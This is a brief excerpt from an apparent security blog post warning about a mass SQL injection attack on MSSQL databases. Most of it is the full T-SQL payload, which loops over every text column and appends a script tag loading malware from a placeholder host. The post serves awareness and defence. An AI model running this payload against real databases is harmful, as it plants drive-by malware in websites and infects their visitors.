TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘+@T+’] set [‘+@C +’]=[‘+@C+’]+””></title><script src=”http://www.domain.com/malware/ w.js”></script><!–” where ‘+@C+’ not like ”%”></title><script src=”http://www.domain.com/malware/w.js “></script><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

 TrustedSource – Blog – New SQL Injection Attack Infecting Machines